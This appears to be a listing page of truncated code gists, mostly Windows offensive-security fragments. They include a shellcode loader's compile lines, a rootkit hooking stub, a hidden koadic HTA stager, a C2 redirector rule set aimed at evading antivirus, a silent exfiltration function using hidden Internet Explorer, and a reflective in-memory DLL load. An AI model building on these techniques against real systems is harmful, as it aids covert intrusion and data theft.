| import System; | |
| import System.Runtime.InteropServices; | |
| import System.Reflection; | |
| import System.Reflection.Emit; | |
| import System.Runtime; | |
| import System.Text; | |
| //C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js | |
| //C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js | |
| #include <windows.h> | |
| #include <stdio.h> | |
| FARPROC fpCreateProcessW; | |
| BYTE bSavedByte; | |
| // Blog Post Here: | |
| // https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108 | |
| // tasklist | findstr explore.exe |
| <html> | |
| <head> | |
| <script language="JScript"> | |
| // HTA skeleton taken from https://github.com/zerosum0x0/koadic | |
| window.resizeTo(1, 1); | |
| window.moveTo(-2000, -2000); | |
| window.blur(); | |
| try | |
| { |
| $exepath = "c:\windows" | |
| $searchstrings = @("/url", "/uri", "/wildcard", "/format", "/path") | |
| $skip = @("logoff.exe", "mcrmgr.exe", "audit.exe") | |
| $foundin = @() | |
| $testedbins = @() | |
| Function Execute-Command ($commandPath, $commandArguments) | |
| { | |
| $pinfo = New-Object System.Diagnostics.ProcessStartInfo | |
| $pinfo.FileName = $commandPath |
| Const HKLM = &H80000002 'HKEY_LOCAL_MACHINE | |
| strComputer = "." | |
| strKey = "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" | |
| Set objLocator = CreateObject("WbemScripting.SWbemLocator") | |
| Set objReg = objLocator.ConnectServer(strComputer, "root\cimv2").Get("StdRegProv") | |
| objReg.EnumKey HKLM, strKey, arrSubKeys | |
| objReg.GetDWORDValue HKLM, strkey, "ProcessCreationIncludeCmdLine_Enabled", isenabled | |
| If IsNull(isenabled) Then |
| RewriteEngine On | |
| # Uncomment the below line for verbose logging, including seeing which rule matched. | |
| #LogLevel alert rewrite:trace5 | |
| # BURN AV BURN | |
| # AWS Exclusions. Cloudfronted requests by default will have a UA of "Amazon Cloudfront". More info here: https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/header-caching.html#header-caching-web-device | |
| RewriteCond expr "-R '54.0.0.0/8'" [OR] | |
| RewriteCond expr "-R '52.0.0.0/8'" [OR] |
| // sample function that takes in a destination server, POST data, and custom HTTP request headers | |
| private string SendData(string dst, byte[] postData, string customHeaders) | |
| { | |
| Type com_type = Type.GetTypeFromCLSID(new Guid("0002DF01-0000-0000-C000-000000000046")); | |
| object IE = Activator.CreateInstance(com_type); | |
| object[] falseArr = new object[] { false }; | |
| object[] trueArr = new object[] { true }; | |
| com_type.InvokeMember("Visible", System.Reflection.BindingFlags.SetProperty, null, IE, falseArr); | |
| com_type.InvokeMember("Silent", System.Reflection.BindingFlags.SetProperty, null, IE, trueArr); |
| "Algorithm","Hash","CatalogPath","Hint" | |
| "SHA256","71A0AEC9941BA21780C3BED570AEAF3BC5B9473BB6662F7CAF194F33C0E1B918","C:\Windows\InfusedApps\Frameworks\Microsoft.Advertising.Xaml_10.1705.4.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat", | |
| "SHA256","F5EEEC38876E48617643A9E735A30B9EC3D08D77075CD81F239A15626E3F7DD5","C:\Windows\InfusedApps\Frameworks\Microsoft.Advertising.Xaml_10.1705.4.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat", | |
| "SHA256","4BA33EC224E42FC929BA6487041C2C4275C5BCA66CD89471A09BC7F522A5661F","C:\Windows\InfusedApps\Frameworks\Microsoft.Advertising.Xaml_10.1705.4.0_x86__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat", | |
| "SHA256","71A0AEC9941BA21780C3BED570AEAF3BC5B9473BB6662F7CAF194F33C0E1B918","C:\Windows\InfusedApps\Frameworks\Microsoft.Advertising.Xaml_10.1705.4.0_x86__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat", |
| $Domain = [AppDomain]::CurrentDomain | |
| $DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly') | |
| $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) | |
| $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule') | |
| # Create a stub module into which the in-memory module will be loaded (this mimics loading a netmodule at runtime). | |
| $ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll') | |
| $TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public) | |
| $TypeBuilder.CreateType() | |
| $HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA |
| # Author: Matthew Graeber (@mattifestation) | |
| # Load dnlib with Add-Type first | |
| # dnlib can be obtained here: https://github.com/0xd4d/dnlib | |
| # Example: ls C:\ -Recurse | Get-AssemblyLoadReference | |
| filter Get-AssemblyLoadReference { | |
| param ( | |
| [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] | |
| [Alias('FullName')] | |
| [String] | |
| [ValidateNotNullOrEmpty()] |